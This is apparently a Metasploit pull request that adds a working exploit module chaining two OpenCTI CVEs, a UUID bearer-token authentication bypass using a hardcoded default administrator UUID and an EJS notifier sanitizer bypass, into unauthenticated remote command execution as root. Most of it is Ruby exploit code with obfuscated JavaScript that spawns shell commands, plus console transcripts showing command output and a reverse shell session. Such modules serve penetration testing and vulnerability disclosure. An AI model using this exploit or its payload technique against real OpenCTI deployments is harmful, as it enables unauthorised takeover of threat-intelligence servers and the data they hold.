### PR TITLE
Add OpenCTI pre-auth notifier RCE exploit

### DIFF
--- a/documentation/modules/exploit/linux/http/opencti_notifier_rce.md
+++ b/documentation/modules/exploit/linux/http/opencti_notifier_rce.md
@@ -1,7 +1,12 @@
 ## Vulnerable Application
 
-OpenCTI is affected by two vulnerabilities that can be chained to achieve
-unauthenticated remote command execution.
+### Introduction
+
+This module chains CVE-2026-27960 and CVE-2026-39980 to achieve unauthenticated
+remote command execution against vulnerable OpenCTI instances. It validates the
+UUID bearer authentication bypass, automatically locates the `Platform mailer`
+notification connector, and then uses the notifier EJS sanitizer bypass to
+execute command payloads in the OpenCTI Node.js process context.
 
 CVE-2026-27960 allows an unauthenticated attacker to query the OpenCTI API as
 an existing user by supplying that user's UUID as a bearer token. The issue
@@ -9,8 +14,8 @@ affects OpenCTI versions 6.6.0 through 6.9.12 and is fixed in 6.9.13.
 
 CVE-2026-39980 is an EJS notifier template sanitizer bypass. A user with the
 required customization capability can execute arbitrary JavaScript in the
-OpenCTI platform process context. The issue affects OpenCTI versions prior to
-6.9.5 and is fixed in 6.9.5.
+OpenCTI platform process context. The issue affects versions prior to 6.9.5 and
+is fixed in 6.9.5.
 
 The overlap for the complete unauthenticated chain is therefore OpenCTI 6.6.0
 through 6.9.4.
@@ -51,6 +56,10 @@ The full chain was validated against OpenCTI 6.8.13.
 7. Alternatively, configure a compatible command payload and run the exploit
    to obtain a session.
 
+`ForceExploit` can be used to continue when the OpenCTI version is unavailable
+or outside the confirmed full-chain range after the operator has independently
+validated the target.
+
 ## Options
 
 ### USER_ID
@@ -77,21 +86,22 @@ The default value is:
 
        120
 
-This option does not apply to detached reverse payloads.
+This option does not apply to detached command payloads.
 
 ## Scenarios
 
-### OpenCTI 6.8.13 - command execution
+### OpenCTI 6.8.13 on Linux - command execution
 
        msf6 > use exploit/linux/http/opencti_notifier_rce
-       msf6 exploit(linux/http/opencti_notifier_rce) > set RHOSTS 127.0.0.1
-       RHOSTS => 127.0.0.1
+       msf6 exploit(linux/http/opencti_notifier_rce) > set RHOSTS 192.0.2.10
+       RHOSTS => 192.0.2.10
        msf6 exploit(linux/http/opencti_notifier_rce) > set RPORT 8080
        RPORT => 8080
        msf6 exploit(linux/http/opencti_notifier_rce) > set SSL false
        SSL => false
        msf6 exploit(linux/http/opencti_notifier_rce) > check
-       [+] 127.0.0.1:8080 - The target is vulnerable. OpenCTI 6.8.13 accepted the UUID bearer token and executed JavaScript through the notifier EJS template
+       [+] 192.0.2.10:8080 - The target is vulnerable. OpenCTI 6.8.13 accepted the UUID bearer token
+           and executed JavaScript through the notifier EJS template
        msf6 exploit(linux/http/opencti_notifier_rce) > set payload cmd/unix/generic
        payload => cmd/unix/generic
        msf6 exploit(linux/http/opencti_notifier_rce) > set CMD id
@@ -100,24 +110,26 @@ This option does not apply to detached reverse payloads.
        [+] Authenticated as admin using UUID bearer bypass
        [*] OpenCTI version: 6.8.13
        [*] Using Platform mailer connector: [...]
-       [*] Executing Unix Command payload
+       [*] Executing cmd/unix/generic payload
        [+] Command executed successfully
-       uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
+       uid=0(root) gid=0(root)
 
-### OpenCTI 6.8.13 - Meterpreter
+### OpenCTI 6.8.13 on Linux - reverse shell
 
-A Python Meterpreter command payload was also validated against the OpenCTI
-6.8.13 container:
-
+       msf6 exploit(linux/http/opencti_notifier_rce) > set payload cmd/unix/reverse_python
+       payload => cmd/unix/reverse_python
+       msf6 exploit(linux/http/opencti_notifier_rce) > set LHOST 192.0.2.20
+       LHOST => 192.0.2.20
+       msf6 exploit(linux/http/opencti_notifier_rce) > set LPORT 4445
+       LPORT => 4445
+       msf6 exploit(linux/http/opencti_notifier_rce) > set WfsDelay 10
+       WfsDelay => 10
        msf6 exploit(linux/http/opencti_notifier_rce) > run
-       [*] Started reverse TCP handler on 192.168.178.33:4444
+       [*] Started reverse TCP handler on 192.0.2.20:4445
+       [+] The target is vulnerable. OpenCTI 6.8.13 accepted the UUID bearer token and executed JavaScript through the notifier EJS template
        [+] Authenticated as admin using UUID bearer bypass
        [*] OpenCTI version: 6.8.13
        [*] Using Platform mailer connector: [...]
-       [*] Executing Unix Command payload
+       [*] Executing cmd/unix/reverse_python payload
        [+] Command payload dispatched successfully
-       [*] Sending stage (...) to 172.21.0.6
-       [*] Meterpreter session 1 opened (...)
-
-       meterpreter > getuid
-       Server username: root
+       [*] Command shell session 1 opened (192.0.2.20:4445 -> 192.0.2.10:53830)

--- a/documentation/modules/exploit/linux/http/opencti_notifier_rce.md
+++ b/documentation/modules/exploit/linux/http/opencti_notifier_rce.md
@@ -1,0 +1,123 @@
+## Vulnerable Application
+
+OpenCTI is affected by two vulnerabilities that can be chained to achieve
+unauthenticated remote command execution.
+
+CVE-2026-27960 allows an unauthenticated attacker to query the OpenCTI API as
+an existing user by supplying that user's UUID as a bearer token. The issue
+affects OpenCTI versions 6.6.0 through 6.9.12 and is fixed in 6.9.13.
+
+CVE-2026-39980 is an EJS notifier template sanitizer bypass. A user with the
+required customization capability can execute arbitrary JavaScript in the
+OpenCTI platform process context. The issue affects OpenCTI versions prior to
+6.9.5 and is fixed in 6.9.5.
+
+The overlap for the complete unauthenticated chain is therefore OpenCTI 6.6.0
+through 6.9.4.
+
+By default, the module uses OpenCTI's deterministic default administrator UUID
+with CVE-2026-27960. A different known user UUID can be supplied with `USER_ID`.
+
+The module automatically locates the `Platform mailer` notification connector
+unless `CONNECTOR_ID` is supplied.
+
+The full chain was validated against OpenCTI 6.8.13.
+
+## Verification Steps
+
+1. Install OpenCTI 6.8.13 with the Platform mailer notification connector
+   available.
+2. Start Metasploit Framework.
+3. Load the module:
+
+       use exploit/linux/http/opencti_notifier_rce
+
+4. Configure the target:
+
+       set RHOSTS <target>
+       set RPORT <port>
+       set SSL <true|false>
+
+5. Verify the complete chain:
+
+       check
+
+6. Execute a command and retrieve its output:
+
+       set payload cmd/unix/generic
+       set CMD id
+       run
+
+7. Alternatively, configure a compatible command payload and run the exploit
+   to obtain a session.
+
+## Options
+
+### USER_ID
+
+An optional OpenCTI user UUID to impersonate.
+
+When unset, the module uses the deterministic default administrator UUID:
+
+       88ec0c6a-13ce-5e39-b486-354fe4a7084f
+
+### CONNECTOR_ID
+
+An optional Platform mailer connector UUID.
+
+When unset, the module enumerates `connectorsForNotification` and selects the
+connector named `Platform mailer` whose schema exposes a `template` field.
+
+### COMMAND_TIMEOUT
+
+Maximum execution time, in seconds, for synchronous `cmd/unix/generic`
+commands.
+
+The default value is:
+
+       120
+
+This option does not apply to detached reverse payloads.
+
+## Scenarios
+
+### OpenCTI 6.8.13 - command execution
+
+       msf6 > use exploit/linux/http/opencti_notifier_rce
+       msf6 exploit(linux/http/opencti_notifier_rce) > set RHOSTS 127.0.0.1
+       RHOSTS => 127.0.0.1
+       msf6 exploit(linux/http/opencti_notifier_rce) > set RPORT 8080
+       RPORT => 8080
+       msf6 exploit(linux/http/opencti_notifier_rce) > set SSL false
+       SSL => false
+       msf6 exploit(linux/http/opencti_notifier_rce) > check
+       [+] 127.0.0.1:8080 - The target is vulnerable. OpenCTI 6.8.13 accepted the UUID bearer token and executed JavaScript through the notifier EJS template
+       msf6 exploit(linux/http/opencti_notifier_rce) > set payload cmd/unix/generic
+       payload => cmd/unix/generic
+       msf6 exploit(linux/http/opencti_notifier_rce) > set CMD id
+       CMD => id
+       msf6 exploit(linux/http/opencti_notifier_rce) > run
+       [+] Authenticated as admin using UUID bearer bypass
+       [*] OpenCTI version: 6.8.13
+       [*] Using Platform mailer connector: [...]
+       [*] Executing Unix Command payload
+       [+] Command executed successfully
+       uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
+
+### OpenCTI 6.8.13 - Meterpreter
+
+A Python Meterpreter command payload was also validated against the OpenCTI
+6.8.13 container:
+
+       msf6 exploit(linux/http/opencti_notifier_rce) > run
+       [*] Started reverse TCP handler on 192.168.178.33:4444
+       [+] Authenticated as admin using UUID bearer bypass
+       [*] OpenCTI version: 6.8.13
+       [*] Using Platform mailer connector: [...]
+       [*] Executing Unix Command payload
+       [+] Command payload dispatched successfully
+       [*] Sending stage (...) to 172.21.0.6
+       [*] Meterpreter session 1 opened (...)
+
+       meterpreter > getuid
+       Server username: root

--- a/modules/exploits/linux/http/opencti_notifier_rce.rb
+++ b/modules/exploits/linux/http/opencti_notifier_rce.rb
@@ -1,0 +1,438 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  DEFAULT_ADMIN_UUID = '88ec0c6a-13ce-5e39-b486-354fe4a7084f'
+  MIN_AUTH_BYPASS_VERSION = Rex::Version.new('6.6.0')
+  FIXED_NOTIFIER_RCE_VERSION = Rex::Version.new('6.9.5')
+  FIXED_AUTH_BYPASS_VERSION = Rex::Version.new('6.9.13')
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'OpenCTI Authentication Bypass and Notifier EJS Remote Code Execution',
+        'Description' => %q{
+          This module chains CVE-2026-27960 and CVE-2026-39980 to achieve
+          unauthenticated remote command execution against vulnerable OpenCTI
+          instances.
+
+          CVE-2026-27960 allows an unauthenticated attacker to authenticate to
+          the GraphQL API using the UUID of an existing user as a bearer token.
+          By default, this module uses OpenCTI's deterministic default
+          administrator UUID. A different user UUID can be supplied with USER_ID.
+
+          After confirming the authentication bypass, the module locates the
+          Platform mailer notification connector and exploits CVE-2026-39980,
+          an EJS notifier template sanitizer bypass, to execute a Unix command in
+          the OpenCTI Node.js process context.
+
+          The full unauthenticated chain applies where the affected version
+          ranges overlap: OpenCTI 6.6.0 through 6.9.4.
+        },
+        'Author' => [
+          'Jean-Marie Bourbon'
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2026-27960'],
+          ['CVE', '2026-39980'],
+          ['GHSA', '6vvv-vmfr-xhrx'],
+          ['GHSA', 'jv9r-jw2f-rhrf']
+        ],
+        'DisclosureDate' => '2026-05-05',
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 4000
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'OpenCTI base path', '/']),
+        OptString.new('USER_ID', [false, 'OpenCTI user UUID to impersonate instead of the default administrator UUID']),
+        OptString.new('CONNECTOR_ID', [false, 'Platform mailer connector UUID (auto-detected if unset)']),
+        OptInt.new('COMMAND_TIMEOUT', [true, 'Synchronous generic command timeout in seconds', 120])
+      ]
+    )
+  end
+
+  def graphql_uri
+    normalize_uri(target_uri.path, 'graphql')
+  end
+
+  def user_id
+    configured = datastore['USER_ID'].to_s
+    configured.empty? ? DEFAULT_ADMIN_UUID : configured
+  end
+
+  def authorization_headers
+    {
+      'Accept' => 'application/json',
+      'Authorization' => "Bearer #{user_id}"
+    }
+  end
+
+  def graphql_request(operation_name, query, variables = {})
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => graphql_uri,
+      'ctype' => 'application/json',
+      'headers' => authorization_headers,
+      'data' => {
+        operationName: operation_name,
+        query: query,
+        variables: variables
+      }.to_json
+    )
+  end
+
+  def parse_graphql_response(res)
+    return nil unless res&.code == 200
+
+    res.get_json_document
+  rescue JSON::ParserError
+    nil
+  end
+
+  def collect_strings(value)
+    case value
+    when Hash
+      value.values.flat_map { |entry| collect_strings(entry) }
+    when Array
+      value.flat_map { |entry| collect_strings(entry) }
+    when String
+      [value]
+    else
+      []
+    end
+  end
+
+  def response_strings(res)
+    json = parse_graphql_response(res)
+    return [res.body.to_s] unless json
+
+    collect_strings(json)
+  end
+
+  def execution_marker_returned?(res, marker)
+    response_strings(res).any? do |text|
+      text.match?(/\n\n#{Regexp.escape(marker)}[^\n]*\z/)
+    end
+  end
+
+  def authentication_probe
+    query = <<~GRAPHQL
+      query AuthBypassProbe {
+        about {
+          version
+        }
+        me {
+          id
+          name
+          user_email
+          capabilities {
+            name
+          }
+        }
+      }
+    GRAPHQL
+
+    res = graphql_request('AuthBypassProbe', query)
+    json = parse_graphql_response(res)
+    return nil unless json.is_a?(Hash)
+
+    me = json.dig('data', 'me')
+    version = json.dig('data', 'about', 'version')
+    return nil unless me.is_a?(Hash)
+
+    {
+      id: me['id'],
+      name: me['name'],
+      email: me['user_email'],
+      capabilities: Array(me['capabilities']).filter_map { |capability| capability['name'] if capability.is_a?(Hash) },
+      version: version
+    }
+  end
+
+  def full_chain_version?(version)
+    return nil if version.to_s.empty?
+
+    parsed = Rex::Version.new(version)
+    parsed >= MIN_AUTH_BYPASS_VERSION && parsed < FIXED_NOTIFIER_RCE_VERSION
+  rescue ArgumentError
+    nil
+  end
+
+  def notification_connector_id
+    configured = datastore['CONNECTOR_ID'].to_s
+    return configured unless configured.empty?
+
+    query = <<~GRAPHQL
+      query NotifierConnectorFieldSearchQuery {
+        connectorsForNotification {
+          id
+          name
+          connector_schema
+          connector_schema_ui
+        }
+      }
+    GRAPHQL
+
+    res = graphql_request('NotifierConnectorFieldSearchQuery', query)
+    json = parse_graphql_response(res)
+    return nil unless json.is_a?(Hash)
+
+    connectors = json.dig('data', 'connectorsForNotification')
+    return nil unless connectors.is_a?(Array)
+
+    connector = connectors.find do |entry|
+      next false unless entry.is_a?(Hash)
+      next false unless entry['name'].to_s.casecmp('Platform mailer').zero?
+
+      schema = entry['connector_schema']
+      schema_text = schema.is_a?(String) ? schema : schema.to_json
+      schema_text.include?('"template"')
+    end
+
+    connector&.fetch('id', nil)
+  end
+
+  def notifier_template(body)
+    "<%=(Function`#{body}`)``%>"
+  end
+
+  def notifier_request(template, connector_id, title)
+    configuration = {
+      title: title,
+      template: template
+    }.to_json
+
+    variables = {
+      input: {
+        notifier_test_id: 'default_notification',
+        notifier_connector_id: connector_id,
+        notifier_configuration: configuration
+      }
+    }
+
+    query = <<~GRAPHQL
+      query NotifierTestDialogQuery($input: NotifierTestInput!) {
+        notifierTest(input: $input)
+      }
+    GRAPHQL
+
+    graphql_request('NotifierTestDialogQuery', query, variables)
+  end
+
+  def sanitizer_probe(connector_id)
+    marker = "OPENCTI-NODE-#{Rex::Text.rand_text_alphanumeric(8)}-"
+    body = %(throw Error["call"](null,"#{marker}"+pro\\u0063ess.version))
+    res = notifier_request(
+      notifier_template(body),
+      connector_id,
+      'Metasploit OpenCTI notifier sanitizer validation'
+    )
+
+    [res, marker]
+  end
+
+  def check
+    auth = authentication_probe
+    return CheckCode::Unknown('OpenCTI did not return a usable GraphQL response') unless auth
+
+    unless auth[:id] == user_id
+      return CheckCode::Safe("UUID bearer authentication bypass was not confirmed (returned user: #{auth[:id] || 'none'})")
+    end
+
+    version = auth[:version]
+    if version.to_s.empty?
+      return CheckCode::Detected("UUID bearer authentication bypass confirmed as #{auth[:name] || auth[:id]}, but the OpenCTI version could not be identified")
+    end
+
+    vulnerable = full_chain_version?(version)
+    if vulnerable == false
+      parsed = Rex::Version.new(version)
+
+      if parsed < MIN_AUTH_BYPASS_VERSION
+        return CheckCode::Safe("OpenCTI #{version} predates the affected CVE-2026-27960 range")
+      end
+
+      if parsed >= FIXED_AUTH_BYPASS_VERSION
+        return CheckCode::Safe("OpenCTI #{version} is patched for CVE-2026-27960")
+      end
+
+      return CheckCode::Safe("OpenCTI #{version} is outside the full-chain range because CVE-2026-39980 is fixed in 6.9.5")
+    end
+
+    return CheckCode::Detected("UUID bearer authentication bypass confirmed on OpenCTI #{version}, but the version could not be classified") if vulnerable.nil?
+
+    connector_id = notification_connector_id
+    return CheckCode::Detected("UUID bearer authentication bypass confirmed on OpenCTI #{version}, but the Platform mailer connector was not found") if connector_id.nil?
+
+    res, marker = sanitizer_probe(connector_id)
+    return CheckCode::Unknown('No response was received while probing the notifier sanitizer') unless res
+
+    if execution_marker_returned?(res, marker)
+      @opencti_connector_id = connector_id
+      @opencti_version = version
+      return CheckCode::Vulnerable("OpenCTI #{version} accepted the UUID bearer token and executed JavaScript through the notifier EJS template")
+    end
+
+    if res.body.to_s.include?('Forbidden call in notifier template')
+      return CheckCode::Safe("OpenCTI #{version} rejected the notifier sanitizer bypass")
+    end
+
+    CheckCode::Detected("OpenCTI #{version} is in the full-chain version range, but active notifier execution was not confirmed")
+  rescue ::Rex::ConnectionError => e
+    CheckCode::Unknown("Connection failed: #{e.message}")
+  rescue StandardError => e
+    CheckCode::Unknown("Check failed: #{e.class}: #{e.message}")
+  end
+
+  def prepare_exploit
+    auth = authentication_probe
+    fail_with(Failure::UnexpectedReply, 'OpenCTI did not return a usable GraphQL response') unless auth
+    fail_with(Failure::NoAccess, 'UUID bearer authentication bypass was not confirmed') unless auth[:id] == user_id
+
+    unless full_chain_version?(auth[:version])
+      fail_with(Failure::NotVulnerable, "OpenCTI #{auth[:version] || 'unknown'} is outside the confirmed full-chain version range")
+    end
+
+    @opencti_version = auth[:version]
+    @opencti_connector_id = notification_connector_id
+    fail_with(Failure::NotFound, 'Platform mailer connector was not found') if @opencti_connector_id.nil?
+
+    print_good("Authenticated as #{auth[:name] || auth[:id]} using UUID bearer bypass")
+    print_status("OpenCTI version: #{@opencti_version}")
+    print_status("Using Platform mailer connector: #{@opencti_connector_id}")
+  end
+
+  def generic_command_payload?
+    datastore['PAYLOAD'].to_s == 'cmd/unix/generic'
+  end
+
+  def extract_marker_value(res, marker)
+    response_strings(res).each do |text|
+      match = text.match(%r{\n\n#{Regexp.escape(marker)}([A-Za-z0-9+/=]*)\z})
+      return match[1] if match
+    end
+
+    nil
+  end
+
+  def execute_generic_command(cmd)
+    command_hex = cmd.unpack1('H*')
+    marker = "OPENCTI-CMD-B64-#{Rex::Text.rand_text_alphanumeric(10)}-"
+
+    body = [
+      'const p=pro\\u0063ess',
+      'const c=p["getBuiltinMo\\u0064ule"]("child_pro\\u0063ess")',
+      %(const q=Buffer["from"]("#{command_hex}","hex")+""),
+      %(const r=c["spawnSync"]("/bin/sh",["-c",q],{encoding:"utf8",timeout:#{datastore['COMMAND_TIMEOUT'] * 1000},maxBuffer:1048576})),
+      'const o=(r.stdout||"")+(r.stderr||"")',
+      'const b=Buffer["from"](o)["toString"]("base64")',
+      %(throw Error["call"](null,"#{marker}"+b))
+    ].join(';')
+
+    res = notifier_request(
+      notifier_template(body),
+      @opencti_connector_id,
+      'Metasploit OpenCTI command execution'
+    )
+
+    fail_with(Failure::Unreachable, 'No response was received after sending the command payload') unless res
+
+    if res.body.to_s.include?('Forbidden call in notifier template')
+      fail_with(Failure::UnexpectedReply, 'The command payload was rejected by the OpenCTI notifier sanitizer')
+    end
+
+    encoded = extract_marker_value(res, marker)
+    fail_with(Failure::UnexpectedReply, 'Command output marker was not returned by OpenCTI') if encoded.nil?
+
+    begin
+      output = Base64.strict_decode64(encoded)
+    rescue ArgumentError
+      fail_with(Failure::UnexpectedReply, 'OpenCTI returned invalid Base64 command output')
+    end
+
+    print_good('Command executed successfully')
+    print_line(output) unless output.empty?
+  end
+
+  def execute_detached_command(cmd)
+    command_hex = cmd.unpack1('H*')
+    marker = "OPENCTI-EXEC-#{Rex::Text.rand_text_alphanumeric(10)}"
+
+    body = [
+      'const p=pro\\u0063ess',
+      'const c=p["getBuiltinMo\\u0064ule"]("child_pro\\u0063ess")',
+      %(const q=Buffer["from"]("#{command_hex}","hex")+""),
+      %q{const r=c["spawn"]("/bin/sh",["-c",q],{detached:true,stdio:"ignore"});r["unref"]()},
+      %(throw Error["call"](null,"#{marker}"))
+    ].join(';')
+
+    res = notifier_request(
+      notifier_template(body),
+      @opencti_connector_id,
+      'Metasploit OpenCTI command execution'
+    )
+
+    unless res
+      vprint_status('No HTTP response was returned after command dispatch')
+      return
+    end
+
+    if res.body.to_s.include?('Forbidden call in notifier template')
+      fail_with(Failure::UnexpectedReply, 'The command payload was rejected by the OpenCTI notifier sanitizer')
+    end
+
+    if execution_marker_returned?(res, marker)
+      print_good('Command payload dispatched successfully')
+    else
+      vprint_status('Command payload dispatched without an execution marker')
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    if generic_command_payload?
+      execute_generic_command(cmd)
+    else
+      execute_detached_command(cmd)
+    end
+  end
+
+  def exploit
+    prepare_exploit unless @opencti_connector_id
+
+    print_status("Executing #{target.name} payload")
+    execute_command(payload.encoded)
+  end
+end

--- a/modules/exploits/linux/http/opencti_notifier_rce.rb
+++ b/modules/exploits/linux/http/opencti_notifier_rce.rb
@@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
           ['GHSA', '6vvv-vmfr-xhrx'],
           ['GHSA', 'jv9r-jw2f-rhrf']
         ],
-        'DisclosureDate' => '2026-05-05',
+        'DisclosureDate' => '2026-05-04',
         'Privileged' => false,
         'Targets' => [
           [
@@ -139,7 +139,8 @@ class MetasploitModule < Msf::Exploit::Remote
     json = parse_graphql_response(res)
     return [res.body.to_s] unless json
 
-    collect_strings(json)
+    strings = collect_strings(json)
+    strings.empty? ? [res.body.to_s] : strings
   end
 
   def execution_marker_returned?(res, marker)
@@ -323,7 +324,12 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::NoAccess, 'UUID bearer authentication bypass was not confirmed') unless auth[:id] == user_id
 
     unless full_chain_version?(auth[:version])
-      fail_with(Failure::NotVulnerable, "OpenCTI #{auth[:version] || 'unknown'} is outside the confirmed full-chain version range")
+      version = auth[:version].to_s.empty? ? 'unknown' : auth[:version]
+      if datastore['ForceExploit']
+        print_warning("OpenCTI #{version} is outside the confirmed full-chain version range; ForceExploit is enabled, continuing")
+      else
+        fail_with(Failure::NotVulnerable, "OpenCTI #{version} is outside the confirmed full-chain version range")
+      end
     end
 
     @opencti_version = auth[:version]
@@ -357,8 +363,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'const c=p["getBuiltinMo\\u0064ule"]("child_pro\\u0063ess")',
       %(const q=Buffer["from"]("#{command_hex}","hex")+""),
       %(const r=c["spawnSync"]("/bin/sh",["-c",q],{encoding:"utf8",timeout:#{datastore['COMMAND_TIMEOUT'] * 1000},maxBuffer:1048576})),
-      'const o=(r.stdout||"")+(r.stderr||"")',
-      'const b=Buffer["from"](o)["toString"]("base64")',
+      'const o={stdout:r.stdout||"",stderr:r.stderr||"",status:r.status,signal:r.signal,error:r.error?{code:r.error.code||"",message:r.error.message||""}:null}',
+      'const b=Buffer["from"](JSON["stringify"](o))["toString"]("base64")',
       %(throw Error["call"](null,"#{marker}"+b))
     ].join(';')
 
@@ -378,9 +384,38 @@ class MetasploitModule < Msf::Exploit::Remote
     fail_with(Failure::UnexpectedReply, 'Command output marker was not returned by OpenCTI') if encoded.nil?
 
     begin
-      output = Base64.strict_decode64(encoded)
-    rescue ArgumentError
-      fail_with(Failure::UnexpectedReply, 'OpenCTI returned invalid Base64 command output')
+      result = JSON.parse(Base64.strict_decode64(encoded))
+    rescue ArgumentError, JSON::ParserError
+      fail_with(Failure::UnexpectedReply, 'OpenCTI returned invalid command execution results')
+    end
+
+    stdout = result['stdout'].to_s
+    stderr = result['stderr'].to_s
+    output = stdout + stderr
+
+    error = result['error']
+    if error.is_a?(Hash)
+      print_line(output) unless output.empty?
+      error_code = error['code'].to_s
+      error_message = error['message'].to_s
+      fail_with(Failure::TimeoutExpired, "Command exceeded the #{datastore['COMMAND_TIMEOUT']} second timeout") if error_code == 'ETIMEDOUT'
+
+      detail = error_code.empty? ? error_message : "#{error_code}: #{error_message}"
+      fail_with(Failure::PayloadFailed, "Command execution failed#{": #{detail}" unless detail.empty?}")
+    end
+
+    signal = result['signal']
+    unless signal.to_s.empty?
+      print_line(output) unless output.empty?
+      fail_with(Failure::PayloadFailed, "Command was terminated by signal #{signal}")
+    end
+
+    status = result['status']
+    fail_with(Failure::UnexpectedReply, 'OpenCTI did not return a command exit status') unless status.is_a?(Integer)
+
+    unless status.zero?
+      print_line(output) unless output.empty?
+      fail_with(Failure::PayloadFailed, "Command exited with status #{status}")
     end
 
     print_good('Command executed successfully')
@@ -432,7 +467,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     prepare_exploit unless @opencti_connector_id
 
-    print_status("Executing #{target.name} payload")
+    print_status("Executing #{datastore['PAYLOAD']} payload")
     execute_command(payload.encoded)
   end
 end


### PR DESCRIPTION
<!-- Describe what this change does. Be specific about the behavior being added or modified. -->

This PR adds a new Metasploit exploit module for OpenCTI that chains CVE-2026-27960 and CVE-2026-39980 to achieve unauthenticated remote command execution.

CVE-2026-27960 is used to authenticate to the OpenCTI GraphQL API by supplying the UUID of an existing user as a bearer token. By default, the module uses the deterministic default administrator UUID, with an optional `USER_ID` override for other known user UUIDs.

After confirming the authentication bypass and identifying the target version, the module automatically locates the `Platform mailer` connector and exploits CVE-2026-39980 to bypass the EJS notifier sanitizer and execute commands in the OpenCTI Node.js process context.

The complete unauthenticated chain applies to OpenCTI versions >= 6.6.0 and < 6.9.5.

The module supports two execution paths:

- `cmd/unix/generic` uses synchronous command execution and returns stdout/stderr directly to Metasploit.
- Other command payloads are dispatched asynchronously, allowing reverse shells and staged payloads such as Python Meterpreter.

The module documentation includes affected versions, configuration details, options, verification steps, and tested scenarios.

<!-- Explain why this change is needed. What problem does it solve or what improvement does it provide? -->

This provides automated exploitation of the complete pre-authentication OpenCTI attack chain instead of requiring CVE-2026-27960 and CVE-2026-39980 to be exercised independently.

The chain was validated against OpenCTI 6.8.13.

Validated behavior:

- Default administrator UUID bearer authentication bypass
- OpenCTI version detection
- Automatic `Platform mailer` connector discovery
- EJS sanitizer bypass validation
- `cmd/unix/generic` execution with stdout/stderr returned to Metasploit
- Detached command payload execution
- Reverse command shell
- Python Meterpreter session
- Command execution as root inside the OpenCTI container

Local validation:

- Ruby syntax: OK
- RuboCop: no offenses detected
- msftidy: no errors or warnings
- `git diff --check`: clean